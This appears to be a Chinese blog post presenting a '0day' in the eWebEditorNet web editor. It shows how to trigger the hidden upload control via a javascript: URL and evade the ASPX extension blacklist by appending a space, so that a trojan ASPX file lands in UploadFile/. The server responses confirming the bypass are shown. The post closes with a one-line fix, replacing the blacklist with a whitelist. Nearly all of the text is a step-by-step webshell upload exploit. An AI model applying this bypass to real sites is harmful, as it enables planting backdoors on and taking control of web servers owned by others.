eWebEditorNet 漏洞演示[0Day]

{
转载请保留版权信息
PopSky 'S Blog
http://www.popsky.org/
}

当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮....

不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车

上传完毕了,看看返回的原代码...[鼠标右键点查看源文件]

<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadError('不允许上传此类型的文件！！');</script>

看来上传失败了...做了过滤,限制ASPX的文件上传了.....

继续回到前面,我们在地址后面打一个空格试试

<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadSavedFinish('20081232115126366.aspx ','jackie.aspx ');history.back();</script>

嘿嘿....绕过了限制......成功的上传了ASPX文件....

文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....

接下来,别再问我还能做什么了,我也不知道.....

总结:

1>
javascript:lbtnUpload.click(); 主语言为javascrypt,向当前页面的lbtnUpload发送一个单击事件...实际上也就相当于我们点了提交按钮,一样的....

2>
脚本里面限制了ASPX为后缀的文件不允许上传,再地址栏后加了一个空格(实际上加别的符号也行,例如 ' ),脚本获取到的文件名就为'aspx ',所以if xxx ='aspx' then 这类型的判断语句就不好使了....修复方法为把不允许改为只允许........